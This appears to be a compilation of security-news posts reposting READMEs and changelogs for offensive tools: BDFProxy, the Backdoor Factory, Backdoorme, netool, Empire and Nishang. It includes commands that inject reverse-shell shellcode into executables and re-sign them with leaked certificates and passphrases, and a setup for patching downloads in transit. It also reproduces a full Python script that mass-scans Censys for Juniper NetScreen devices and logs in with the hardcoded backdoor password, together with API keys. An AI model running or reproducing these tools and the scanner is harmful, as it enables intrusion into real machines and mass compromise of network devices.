For security professionals and researchers only.

Changelog v0.3.7 :
– removing dependencies on python_magic and libmagic

BDFProxy v0.3.7

This script rides on two libraries for usage: The Backdoor Factory (BDF) and the mitmProxy.
Concept:
Patch binaries during download ala MITM.
Why:
Because a lot of security tool websites still serve binaries via non-SSL/TLS means.
Here’s a short list:

sysinternals.com
Microsoft - MS Security Essentials
Almost all anti-virus companies
Malwarebytes
Sourceforge
gpg4win
Wireshark
etc...

+ Supported Environment:

Tested on all Kali Linux builds, whether a physical beefy laptop, a Raspberry Pi, or a VM, each can run BDFProxy.

Install:
BDF is in bdf/
Run the following to pull down the most recent:

./install.sh

OR:

git clone https://github.com/secretsquirrel/the-backdoor-factory bdf/
If you get a certificate error, run the following:

mitmproxy
And exit [Ctr+C] after mitmProxy loads.

Usage:

Update everything before each use:

./update.sh

 READ THE CONFIG!!!

-->bdfproxy.cfg

You will need to configure your C2 host and port settings before running BDFProxy. DO NOT overlap C2 PORT settings between different payloads. You’ll be sending linux shells to windows machines and things will be segfaulting all over the place. After running, there will be a metasploit resource script created to help with setting up your C2 communications. Check it carefully. By the way, everything outside the [Overall] section updates on the fly, so you don’t have to kill your proxy to change settings to work with your environment.

But wait! You will need to configure your mitm machine for mitm-ing! If you are using a wifiPineapple I modded a script put out by hack5 to help you with configuration. Run ./wpBDF.sh and enter in the correct configs for your environment. This script configures iptables to push only http (non-ssl) traffic through the proxy. All other traffic is fowarded normally.

Then:

./bdf_proxy.py

Here’s some sweet ascii art for possible phyiscal settings of the proxy:
Lan usage:

<Internet>----<mitmMachine>----<userLan>

WIFI Usage :

<Internet>----<mitmMachine>----<wifiPineapple>))

 Testing : 

Suppose you want to use your browser with Firefox and FoxyProxy to connect to test your setup.

    Update your config as follows:
    transparentProxy = False

    Configure FoxyProxy to use BDFProxy as a proxy.
    Default port in the config is 8080.

+ Logging:

We have it. The proxy window will quickly fill with massive amounts of cat links depending on the client you are testing. Use tail -f proxy.log to see what is getting patched and blocked by your blacklist settings. However, keep an eye on the main proxy window if you have chosen to patch binaries manually, things move fast and behind the scences there is multi-threading of traffic, but the intial requests and responses are locking for your viewing pleasure.

+ Attack Scenarios (all with permission of targets):
-Evil Wifi AP
-Arp Redirection
-Physical plant in a wiring closet
-Logical plant at your favorite ISP

Download version :
BDFProxy-0.3.7.tar.gz(15.91 KB)
BDFProxy-0.3.7.zip(14.42 KB)  | Our Post Before | Source : https://github.com/secretsquirrel

Contact the developer on:
IRC: irc.freenode.net #BDFactory
Twitter: @midnite_runr

NOTICE: For security professionals and researchers only.
Changelog 11/13/2015 v2.3.2:

– proper removeal of PE Sig resulting in better IAT patching
– pebin.py : proper truncation of unsigned PE
– backdoor.py : proper truncation of unsigned PE

Update:
– cd <your folder BDF>
– git pull

BDF v-2.3.2

The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.

Features:
+ PE Files
+ ELF Files
+ Mach-O Files
+ Overall

Dependences:
Capstone, using the ‘next’ repo until it is the ‘master’ repo: https://github.com/aquynh/capstone/tree/next
Pefile, most recent: https://code.google.com/p/pefile/ 

INSTALL:
./install.sh

This will install Capstone with the ‘next’ repo and use pip to install pefile.

UPDATE:
./update.sh

Documentation and Presentation:
– http://www.slideshare.net/midnite_runr/patching-windows-executables-with-the-backdoor-factory
– http://www.youtube.com/watch?v=LjUN9MACaTs

Sample Usage:
Patch an exe/dll using an existing code cave:

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp 

[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 402
[*] All caves lengths:  (402,)
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don't like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 402
[*] Available caves:
1. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e4d5 End: 0x2e6d0; Cave Size: 507
2. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e6e9 End: 0x2e8d5; Cave Size: 492
3. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e8e3 End: 0x2ead8; Cave Size: 501
4. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eaf1 End: 0x2ecdd; Cave Size: 492
5. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2ece7 End: 0x2eee0; Cave Size: 505
6. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eef3 End: 0x2f0e5; Cave Size: 498
7. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f0fb End: 0x2f2ea; Cave Size: 495
8. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f2ff End: 0x2f4f8; Cave Size: 505
9. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f571 End: 0x2f7a0; Cave Size: 559
10. Section Name: .rsrc; Section Begin: 0x30600 End: 0x5f200; Cave begin: 0x5b239 End: 0x5b468; Cave Size: 559
**************************************************
[!] Enter your selection: 5
Using selection: 5
[*] Changing Section Flags
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory

Patch an exe/dll by adding a code section:

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a 
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Creating Code Cave
- Adding a new section to the exe/dll for shellcode injection
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory

Patch a directory of exes:

./backdoor.py -d test/ -i 192.168.0.100 -p 8080 -s reverse_shell_tcp -a
...output too long for README...

User supplied shellcode:

msfpayload windows/exec CMD='calc.exe' R > calc.bin
./backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin
This will pop calc.exe on a target windows workstation. So 1337. Much pwn. Wow.

Hunt and backdoor: Injector | Windows Only

The injector module will look for target executables to backdoor on disk.  It will check to see if you have identified the target as a service, check to see if the process is running, kill the process and/or service, inject the executable with the shellcode, save the original file to either file.exe.old or another suffix of choice, and attempt to restart the process or service.  
Edit the python dictionary "list_of_targets" in the 'injector' module for targets of your choosing.

./backdoor.py -i -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a -u .moocowwow

Download : the-backdoor-factory-3.2.3.zip |  the-backdoor-factory-3.2.3.tar.gz

Contact the developer on:
IRC: irc.freenode.net #BDFactory
Twitter: @midnite_runr
Source : https://github.com/secretsquirrel/the-backdoor-factory | Our Post Before

NOTICE: For security professionals and researchers only.

Backdoorme is a simple utility that logs into a Linux machine and gives the user the option to install a slew of backdoors.

BackdoorMe a powerful auto-backdooring utility. This Backdoor has Been Tested on Kali Linux 2.0 and Ubuntu 14.04

Currently enabled backdoors include:
+ Bash
+ Netcat
+ Netcat-traditional
+ Metasploit
+ Perl
+ Pupy
– Python :Please run the dependencies python script to install the necessary dependencies. Backdoorme requires python2.7 or higher.

Instalation:

git clone https://github.com/Kkevsterrr/backdoorme <Your Clone Folder Name>
cd <your Folder>
python dependencies.py
python master.py

Source: https://github.com/Kkevsterrr

Changelog v-4.6:
The toolkit was named of ‘Single_byte_XOR’ because this version it focous in obfuscating payloads with the inclusion of Shellter PE injector and diferent msf encoders with diferent interactions to evade AV detection (windows binaries) also the tool will ship with the new automated exploit ‘web_delivery’ that execute the 2º stage in ram without touching disk.
we now have 5 modules that trys to evade AV detection (windows):
2 – Backdooring EXE Files -> bdf_backdoor module
4 – Meterpreter (ReL1K) -> powershell payload
5 – Web_delivery (PSH/PYTHON) -> powershell or python
27 – Generate shellcode -> c-to-exe -> veil-evasion
29 – Shellter PE infector -> inject shellcode into windows binaries
☆ ☆ ☆ ☆ ☆
[ Upgraded ]
msfcli replaced by msfconsole

[ Bugs Fixed ]
+ ettercap IPV6 bug -> incorrect target selection /// ///
+ host-a-file -> phishing webpages displays under MitM
[ New Modules ]
+ MitM ROUTER phishing -> capture router credentials
+ unicorn.py -> HTA drive-by URL payload execution
+ java.jar phishing -> Drive-by URL payload execution
+ adobe_flash_hacking_team_uaf -> exploit + mitm + dns_spoof
+ web_delivery msf module -> python or powershell payloads
+ Shellter PE injector (by kyREcon) binaries windows obfuscator

[ Improved ]
+ netool toolkit Gnu Public License (GPL) display
+ build shortcut to toolkit -> gnome-desktop-item-edit
+ file-selection GUI to ettercap -> zenity displays added
+ host-a-file attack -> zenity file-selection GUI added
+ windows payloads encoding (diferent msf encoders/interactions)

Operative Systems Supported:
+ Linux-Ubuntu | Linux-kali | Parrot security OS | backbox OS | Linux-backtrack (un-continued) | Mac osx (un-continued).

netool- version 4.6 codename Single_byte_XOR

Netool: its a toolkit written using ‘bash, python, ruby’ that allows you to automate frameworks like Nmap, Driftnet, Sslstrip, Metasploit and Ettercap MitM attacks. this toolkit makes it easy tasks such as SNIFFING tcp/udp traffic, Man-In-The-Middle attacks, SSL-sniff, DNS-spoofing, D0S attacks in wan/lan networks, TCP/UDP packet manipulation using etter-filters, and gives you the ability to capture pictures of target webbrowser surfing (driftnet) also uses macchanger to decoy scans changing the mac address.

Rootsector: module allows you to automate some attacks over DNS_SPOOF + MitM(phishing – social engineering) using metasploit, apache2 and ettercap frameworks. like the generation of payloads,shellcode,backdoors delivered using dns_spoof and MitM method to redirect a target to your phishing webpage.

Recently was introduced “inurlbr” webscanner (by cleiton) that allow us to search SQL related bugs, using severeal search engines, also this framework can be used in conjunction with other frameworks like nmap, (using the flag –comand-vul)

Installation:

git clone git://git.code.sf.net/p/netoolsh/opensource-kali opensource
cd opensource
chmod +x INSTALL.sh
./INSTALL.sh

Note for version 4.6 : You must install Manually using source DOwnload
tar xf *.tar.gz
cd your folder
./INSTALL.sh
Update type: u

Example: 

inurlbr.php -q 1,2,10 --dork 'inurl:index.php?id=' --exploit-get ?´0x27
-s report.log --comand-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'

Operative Systems Supported:
Linux-Ubuntu | Linux-kali | Parrot security OS | blackbox OS | Linux-backtrack (un-continued) | Mac osx (un-continued).

“TOOLKIT DEPENDENCIES”
zenity | Nmap | Ettercap | Macchanger | Metasploit | Driftnet | Apache2 | sslstrip

“SCANNER INURLBR.php”
curl | libcurl3 | libcurl3-dev | php5 | php5-cli | php5-curl

Download : Ubuntu: opensource.tar.gz (26.9 MB)  | Kali-Linux: opensource[kali].tar.gz(26.9 MB)
Source : http://sourceforge.net/projects/netoolsh/
Our Post Before : http://seclist.us/netool-sh-v-4-5-2-released-mitm-pentesting-opensource-t00lkit.html

Changelog v-1.3.6:
– Combined persistence/debugger/* into persistence/misc/debugger
– Added SysWow64 option to management/spawn to spawn a 32-bit powershell.exe
– Added persistence/userland/backdoor_lnk
– Built several modules in management/mailraider/* to integrate @xorrior’s MailRaider.ps1
– Merged @xorrior’s FoxDump and ChromeDump modules.
– Merged @rvrsh3ll’s lateral_movement/invoke_sshcommand

empire-v1.3.6

Update:
– cd your empire folder
– git pull

Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

Empire Module Menu

Initial Setup:
Run the ./setup/install.sh script. This will install the few dependencies and run the ./setup/setup_database.py script. The setup_database.py file contains various setting that you can manually modify, and then initializes the ./data/empire.db backend database. No additional configuration should be needed- hopefully everything works out of the box.
Running ./empire will start Empire, and ./empire –debug will generate a verbose debug log at ./empire.debug. The included ./data/reset.sh will reset/reinitialize the database and launch Empire in debug mode.

Download : v1.3.zip | v1.3.0.tar.gz |Our Post Before | Clone Url
Source : http://www.powershellempire.com | https://github.com/PowerShellEmpire

Changelog v-1.3.7:
– Updated powerview.ps1
– Added situational_awareness/network/powerview/get_cached_rdpconnection
– Added situational_awareness/network/powerview/set_ad_object
– Added management/downgrade_account
– Added credentials/mimikatz/cache

empire-1-3-7

Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

Empire Module Menu

Installation using git:

git clone https://github.com/PowerShellEmpire/Empire
cd Empire/setup
./install.sh
python setup_database.py (for setup database)
./empire

Update:
cd Empire
git pull

Initial Setup:
Run the ./setup/install.sh script. This will install the few dependencies and run the ./setup/setup_database.py script. The setup_database.py file contains various setting that you can manually modify, and then initializes the ./data/empire.db backend database. No additional configuration should be needed- hopefully everything works out of the box.
Running ./empire will start Empire, and ./empire –debug will generate a verbose debug log at ./empire.debug. The included ./data/reset.sh will reset/reinitialize the database and launch Empire in debug mode.

Download : v1.3.zip | v1.3.0.tar.gz |Our Post Before | Clone Url
Source : http://www.powershellempire.com | https://github.com/PowerShellEmpire

Changelog v0.6.1:
+ Added Show-TargetScreen to the Gather directory.

DESCRIPTION
This script uses MJPEG to stream a target’s desktop in real time. It is able to connect to a standard netcat listening on a port when using the -Reverse switch. Also, a standard netcat can connect to this script Bind to a specific port.
A netcat listener which relays connection to a local port could be used as listener. A browser which supports MJPEG (Firefox) should then be pointed to the local port to see the remote desktop.

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and penetration testing. Nishang is useful during various phases of a penetration test and is most powerful for post exploitation usage.

Nishang v-0.6.1 released: PowerShell for penetration testing and offensive security.

Scripts; Nishang currently contains the following scripts and payloads.
+ Antak – the Webshell
– Antak :Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell

+ Backdoors
– HTTP-Backdoor : A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
– DNS_TXT_Pwnage : A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
– Execute-OnTime : A backdoor which can execute PowerShell scripts at a given time on a target.
– Gupt-Backdoor : A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
– Add-ScrnSaveBackdoor : A backdoor which can use Windows screen saver for remote command and script execution.
– Invoke-ADSBackdoor : A backdoor which can use alternate data streams and Windows Registry to achieve persistence.

+ Client
– Out-CHM : Create infected CHM files which can execute PowerShell commands and scripts.
– Out-Word : Create Word files and infect existing ones to run PowerShell commands and scripts.
– Out-Excel : Create Excel files and infect existing ones to run PowerShell commands and scripts.
– Out-HTA : Create a HTA file which can be deployed on a web server and used in phishing campaigns.
– Out-Java : Create signed JAR files which can be used with applets for script and command execution.
– Out-Shortcut : Create shortcut files capable of executing commands and scripts.
– Out-WebQuery : Create IQY files for phishing credentials and SMB hashes.

+ Escalation
– Enable-DuplicateToken : When SYSTEM privileges are required.
– Remove-Update : Introduce vulnerabilities by removing patches.

+ Execution
– Download-Execute-PS : Download and execute a PowerShell script in memory.
– Download_Execute : Download an executable in text format, convert it to an executable, and execute.
– Execute-Command-MSSQL : Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.
– Execute-DNSTXT-Code : Execute shellcode in memory using DNS TXT queries.

+ Gather
– Check-VM : Check for a virtual machine.
– Copy-VSS : Copy the SAM file using Volume Shadow Copy Service.
– Invoke-CredentialsPhish : Trick a user into giving credentials in plain text.
– FireBuster FireListener: A pair of scripts for egress testing
– Get-Information : Get juicy information from a target.
– Get-LSASecret : Get LSA Secret from a target.
– Get-PassHashes : Get password hashes from a target.
– Get-WLAN-Keys: Get WLAN keys in plain text from a target.

+ Keylogger
Log keystrokes from a target.
– Invoke-MimikatzWdigestDowngrade: Dump user passwords in plain on Windows 8.1 and Server 2012
– Get-PassHints : Get password hints of Windows users from a target.

+ Pivot
– reate-MultipleSessions : Check credentials on multiple computers and create PSSessions.
– Run-EXEonRemote Copy and execute an executable on multiple machines.
– Invoke-NetworkRelay Create network relays between computers.

+ Prasadhak
– Prasadhak : Check running hashes of running process against the VirusTotal database.

+ Scan
– Brute-Force : Brute force FTP, Active Directory, MSSQL, and Sharepoint.
– Port-Scan : A handy port scanner

+ Powerpreter
Powerpreter : All the functionality of nishang in a single script module.

+ Shells :
– Invoke-PsGcat: Send commands and scripts to specifed Gmail account to be executed by Invoke-PsGcatAgent
– Invoke-PsGcatAgent: Execute commands and scripts sent by Invoke-PsGcat.
– Invoke-PowerShellTcp: An interactive PowerShell reverse connect or bind shell
– Invoke-PowerShellTcpOneLine : Stripped down version of Invoke-PowerShellTcp. Also contains, a skeleton version which could fit in two tweets.
– Invoke-PowerShellUdp : An interactive PowerShell reverse connect or bind shell over UDP
– Invoke-PowerShellUdpOneLine : Stripped down version of Invoke-PowerShellUdp.
– Invoke-PoshRatHttps : Reverse interactive PowerShell over HTTPS.
– Invoke-PoshRatHttp : Reverse interactive PowerShell over HTTP.
– Remove-PoshRat : Clean the system after using Invoke-PoshRatHttps
– Invoke-PowerShellWmi : Interactive PowerShell using WMI.
– Invoke-PowerShellIcmp : An interactive PowerShell reverse shell over ICMP.

+ Utility:
– Add-Exfiltration: Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.
– Add-Persistence: Add reboot persistence capability to a script.
– Remove-Persistence: Remote persistence added by the Add-Persistence script.
– Do-Exfiltration: Pipe (|) this to any script to exfiltrate the output.
– Download: Transfer a file to the target.
– Parse_Keys : Parse keys logged by the keylogger.
– Invoke-Encode : Encode and compress a script or string.
– Invoke-Decode : Decode and decompress a script or string from Invoke-Encode.
– Start-CaptureServer : Run a web server which logs Basic authentication and SMB hashes.
— [Base64ToString] [StringToBase64] [ExetoText] [TexttoExe]

Download : Nishang.zip(708 KB) | Our Post Before
Source : http://www.labofapenetrationtester.com/

Changelog v3.3.0:
+ Added PE codesiging support. You must provide your own codesigning cert. You can see full disclosure how to Add PE Code Signing to Backdoor Factory (BDF).

BDFactory-v-3-3-0
Test Run Using PE Code Signing

The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.

Features:
+ PE Files
+ ELF Files
+ Mach-O Files
+ Overall

Dependencies:
Capstone, using the ‘next’ repo until it is the ‘master’ repo: https://github.com/aquynh/capstone/tree/next
Pefile, most recent: https://code.google.com/p/pefile/

INSTALL:

git clone https://github.com/secretsquirrel/the-backdoor-factory
cd the-backdoor-factory
./install.sh

This will install Capstone with the ‘next’ repo and use pip to install pefile.

UPDATE:
./update.sh

Documentation and Presentation:
– http://www.slideshare.net/midnite_runr/patching-windows-executables-with-the-backdoor-factory
– http://www.youtube.com/watch?v=LjUN9MACaTs

Sample Usage:
Patch an exe/dll using an existing code cave:

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp 

[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 402
[*] All caves lengths:  (402,)
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don't like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 402
[*] Available caves:
1. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e4d5 End: 0x2e6d0; Cave Size: 507
2. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e6e9 End: 0x2e8d5; Cave Size: 492
3. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e8e3 End: 0x2ead8; Cave Size: 501
4. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eaf1 End: 0x2ecdd; Cave Size: 492
5. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2ece7 End: 0x2eee0; Cave Size: 505
6. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eef3 End: 0x2f0e5; Cave Size: 498
7. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f0fb End: 0x2f2ea; Cave Size: 495
8. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f2ff End: 0x2f4f8; Cave Size: 505
9. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f571 End: 0x2f7a0; Cave Size: 559
10. Section Name: .rsrc; Section Begin: 0x30600 End: 0x5f200; Cave begin: 0x5b239 End: 0x5b468; Cave Size: 559
**************************************************
[!] Enter your selection: 5
Using selection: 5
[*] Changing Section Flags
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory

Patch an exe/dll by adding a code section:

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a 
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Creating Code Cave
- Adding a new section to the exe/dll for shellcode injection
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory

Patch a directory of exes:

./backdoor.py -d test/ -i 192.168.0.100 -p 8080 -s reverse_shell_tcp -a
...output too long for README...

User supplied shellcode:

msfpayload windows/exec CMD='calc.exe' R > calc.bin
./backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin
This will pop calc.exe on a target windows workstation. So 1337. Much pwn. Wow.

Hunt and backdoor: Injector | Windows Only

The injector module will look for target executables to backdoor on disk.  It will check to see if you have identified the target as a service, check to see if the process is running, kill the process and/or service, inject the executable with the shellcode, save the original file to either file.exe.old or another suffix of choice, and attempt to restart the process or service.  
Edit the python dictionary "list_of_targets" in the 'injector' module for targets of your choosing.

./backdoor.py -i -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a -u .moocowwow

Code Signing Certs Configure:

git clone git://git.code.sf.net/p/osslsigncode/osslsigncode osslsigncode
./autogen.sh
./configure
make
sudo make install

Navigate to your BDF home directory.

the-backdoor-factory git:(master) $
curl -O https://www.duosecurity.com/static/files/DellCertificates.zip
mkdir certs
unzip DellCertificates.zip -d certs

make a private key:

openssl pkcs12 -in certs/Verisign.pfx -nocerts -out certs/VerisignPrivateKey.pem
Enter Import Password: t-span
MAC verified OK
Enter PEM pass phrase: moomoo
Verifying - Enter PEM pass phrase: moomoo

Let's test everything out:

curl -O http://live.sysinternals.com/tcpview.exe # yay http

osslsigncode extract-signature -in tcpview.exe -out sig.txt

hexdump -C sig.txt

Test run:

osslsigncode -certs certs/Verisign.cer -key certs/VerisignPrivateKey.pem -n "Securitay" -in tcpview.exe -out tcpview_signed.exe -pass moomoo
osslsigncode extract-signature -in tcpview_signed.exe -out sig.txt
hexdump -C sig1.txt

Then now Open pebin.py in your favorite editor, and replace the code on line 1763(on behind self.binary.close() line 1759, save and test against your victim machine:

if self.ZERO_CERT is True:
            # cert was removed earlier 
            p = subprocess.Popen(['osslsigncode', '-certs', 'certs/Verisign.cer', '-key', \
                                  'certs/VerisignPrivateKey.pem', '-n', 'Security','-in', \
                                   self.flItms["backdoorfile"], '-out', self.flItms["backdoorfile"], '-pass', 'moomoo'])

 p.wait()

Download : the-backdoor-factory-3.3.0.zip |  the-backdoor-factory-3.3.0.tar.gz

Contact the developer on:
IRC: irc.freenode.net #BDFactory
Twitter: @midnite_runr
Source : https://github.com/secretsquirrel/the-backdoor-factory | Our Post Before

NOTICE: For security professionals and researchers only.

For security professionals and researchers only.

Changelog v0.3.8 12/20/2015:
+ Added configuration options in bdfproxy.cfg to support PE code signing from BDF => CODE_SIGN See BDF README for details.

This script rides on two libraries for usage: The Backdoor Factory (BDF) and the mitmProxy.
Concept:
Patch binaries during download ala MITM.
Why:
Because a lot of security tool websites still serve binaries via non-SSL/TLS means.
Here’s a short list:

sysinternals.com
Microsoft - MS Security Essentials
Almost all anti-virus companies
Malwarebytes
Sourceforge
gpg4win
Wireshark
etc...

+ Supported Environment:

Tested on all Kali Linux builds, whether a physical beefy laptop, a Raspberry Pi, or a VM, each can run BDFProxy.

Install:
BDF is in bdf/
Run the following to pull down the most recent:

./install.sh

OR:

git clone https://github.com/secretsquirrel/the-backdoor-factory bdf/
If you get a certificate error, run the following:

mitmproxy
And exit [Ctr+C] after mitmProxy loads.

Usage:

Update everything before each use:

./update.sh

 READ THE CONFIG!!!

-->bdfproxy.cfg

You will need to configure your C2 host and port settings before running BDFProxy. DO NOT overlap C2 PORT settings between different payloads. You’ll be sending linux shells to windows machines and things will be segfaulting all over the place. After running, there will be a metasploit resource script created to help with setting up your C2 communications. Check it carefully. By the way, everything outside the [Overall] section updates on the fly, so you don’t have to kill your proxy to change settings to work with your environment.

But wait! You will need to configure your mitm machine for mitm-ing! If you are using a wifiPineapple I modded a script put out by hack5 to help you with configuration. Run ./wpBDF.sh and enter in the correct configs for your environment. This script configures iptables to push only http (non-ssl) traffic through the proxy. All other traffic is fowarded normally.

Then:

./bdf_proxy.py

Here’s some sweet ascii art for possible phyiscal settings of the proxy:
Lan usage:

<Internet>----<mitmMachine>----<userLan>

WIFI Usage :

<Internet>----<mitmMachine>----<wifiPineapple>))

 Testing : 

Suppose you want to use your browser with Firefox and FoxyProxy to connect to test your setup.

    Update your config as follows:
    transparentProxy = False

    Configure FoxyProxy to use BDFProxy as a proxy.
    Default port in the config is 8080.

+ Logging:

We have it. The proxy window will quickly fill with massive amounts of cat links depending on the client you are testing. Use tail -f proxy.log to see what is getting patched and blocked by your blacklist settings. However, keep an eye on the main proxy window if you have chosen to patch binaries manually, things move fast and behind the scences there is multi-threading of traffic, but the intial requests and responses are locking for your viewing pleasure.

+ Attack Scenarios (all with permission of targets):
-Evil Wifi AP
-Arp Redirection
-Physical plant in a wiring closet
-Logical plant at your favorite ISP

Download : 0.3.8.zip  | 0.3.8.tar.gz  |Our Post Before | Source : https://github.com/secretsquirrel

Contact the developer on:
IRC: irc.freenode.net #BDFactory
Twitter: @midnite_runr

Background:
Censys is a networking device to search for information about new search engine, security experts can use it to evaluate their programs to achieve security, hackers can use it as a preliminary investigation target, target information collected powerful weapon. Its function is very similar to the very popular Shodan, however, compared with the Shodan its advantage is that this is a free search engine, originally published by researchers at the University of Michigan in October, is currently supported by Google. Chief Information Security Officer Bob Worrall Juniper’s senior vice president, said, discovered two vulnerabilities in recent internal code audit process, the impact of ScreenOS 6.2.0r15-6.2.0r18,6.3.0r12-6.3.0r20 version. One is not authorization code vulnerabilities can be decrypted VPN traffic; another could allow an attacker to remotely manage through SSH or telnet access device.
Juniper mentioned that access to these systems will be recorded, password authentication will be successful, but the attacker can change or delete the log entry.

JuniperBackdoor.py Script:

from pexpect import pxssh
from Queue import Queue
import threading
import time
import re
import sys
import json
import requests
import math

user = "root"
passwd = "<<< %s(un='%s') = %u"

API_URL = "https://www.censys.io/api/v1"
UID = "373ab943-2e4b-4088-b1ac-396c0c21ce2c"
SECRET = "sRwAT71mrRJnyZBD95sjEjkFLXRjP5n6"

PAGES = 50
cur_page = 1
thread_num = 20

queue = Queue()

class testTarget(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)

    def run(self):
        global queue
        while True:
            for i in range(5):
                if not queue.empty():
                    ip = queue.get()
                else:
                    break
                theSSH = connectSSH(ip, user, passwd)
                if theSSH:
                    before = theSSH.before
                    try:
                        theSSH.logout()
                    except:
                        pass
                    isval = re.search('Remote Management Console', before)
                    if isval:
                        print "%s is vul" % ip
                        ip_OK.write("%s\n" % ip)
                        ip_OK.flush()
                    else:
                        print "%s is not vul" %ip
            time.sleep(1)

def connectSSH(host, user, passwd):
    try:
        ssh = pxssh.pxssh()
        ssh.login(host, user, passwd, auto_prompt_reset = False)
        return ssh
    except Exception, e:
        print "%s is not vul" % host

def getIp(page):
    start_time = time.time()
    data = {
        "query":"22.ssh.banner.software_version:NetScreen location.country:China", 
        "page":page, 
        "fields":["ip"]
    }
    try:
        res = requests.post(API_URL + "/search/ipv4", data=json.dumps(data), auth=(UID, SECRET))
    except:
        pass
    else:
        try:
            results = res.json()
        except:
            pass
        else:
            if res.status_code != 200:
                print "error occurred: %s" % results["error"]
                sys.exit(1)
            else:
                result_iter = iter(results["results"])
                for result in result_iter:
                    queue.put(result["ip"])

def test():
    for i in range(thread_num):
        t = testTarget()
        t.start()

if __name__ == '__main__':
    ip_OK = open("ip_OK.txt", "w")
    getIp(cur_page)
    test()
    while queue.qsize() > 0:
        if cur_page <= PAGES:
            getIp(cur_page)
            cur_page += 1
        time.sleep(0.1)
    ip_OK.close()

Source : https://github.com/s0m30ne

Latest Change 23/12/2015:
+ fixed travis version.
+ added poison module.
+ Fixed Bash and added a second bash backdoor.
+ removed offending tests.

Backdoorme is a simple utility that logs into a Linux machine and gives the user the option to install a slew of backdoors.

BackdoorMe a powerful auto-backdooring utility. This Backdoor has Been Tested on Kali Linux 2.0 and Ubuntu 14.04

Currently enabled backdoors include:
+ Bash
+ Netcat
+ Netcat-traditional
+ Metasploit
+ Perl
+ Pupy
– Python :Please run the dependencies python script to install the necessary dependencies. Backdoorme requires python2.7 or higher.

Instalation:

git clone https://github.com/Kkevsterrr/backdoorme <Your Clone Folder Name>
cd <your Folder>
python dependencies.py
python master.py


Update:
cd backdoorme
git pull

Source: https://github.com/Kkevsterrr | Our post Before

